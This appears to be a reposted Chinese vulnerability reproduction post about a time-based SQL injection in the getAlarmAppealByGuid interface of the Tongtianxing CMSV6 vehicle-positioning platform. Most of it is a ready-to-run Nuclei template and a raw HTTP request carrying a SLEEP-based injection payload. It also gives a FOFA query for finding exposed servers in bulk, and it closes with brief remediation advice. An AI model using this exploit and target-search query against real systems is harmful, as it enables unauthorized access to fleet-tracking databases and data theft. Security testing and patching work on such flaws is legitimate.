漏洞描述:
通天星CMSV6车载定位监控平台getAlarmAppealByGuid接口处存在SQL注入漏洞。这可能导致泄露敏感数据、破坏数据库完整性,甚至获取对数据库的完全控制。
—
Nuclei POC
id: tongtianxing-CMSV6-getAlarmAppealByGuid-SQL info: name: 通天星CMSV6车载定位监控平台getAlarmAppealByGuid接口处存在SQL注入漏洞 author: kingkong severity: high metadata: fofa-query: body="/808gps/" http: - raw: - | POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Encoding: gzip, deflate guid=1') AND (SELECT 3904 FROM (SELECT(SLEEP(3)))PITq) AND ('qhqF'='qhqF matchers-condition: and matchers: - type: dsl dsl: - "duration>=3 && duration<=6 && status_code==200"
—
搜索语法
FOFA:body="/808gps/"
界面如下
—
漏洞复现
漏洞检测POC
POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
guid=1') AND (SELECT 3904 FROM (SELECT(SLEEP(3)))PITq) AND ('qhqF'='qhqF
neclei批量检测截图
—
修复建议
1、使用参数化查询:使用参数化的 SQL 查询语句,而不是将用户输入直接拼接到 SQL 语句中。这可以防止恶意输入被误解为 SQL 代码。
2、输入验证和过滤:对用户输入的数据进行严格的验证和过滤,确保输入的数据符合预期格式和类型。
3、最小权限原则:确保数据库连接使用的账户具有最小必要的权限,避免使用具有过高权限的账户。
—
下载地址
原文始发于微信公众号(脚本小子):通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞【漏洞复现|附nuclei-POC】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论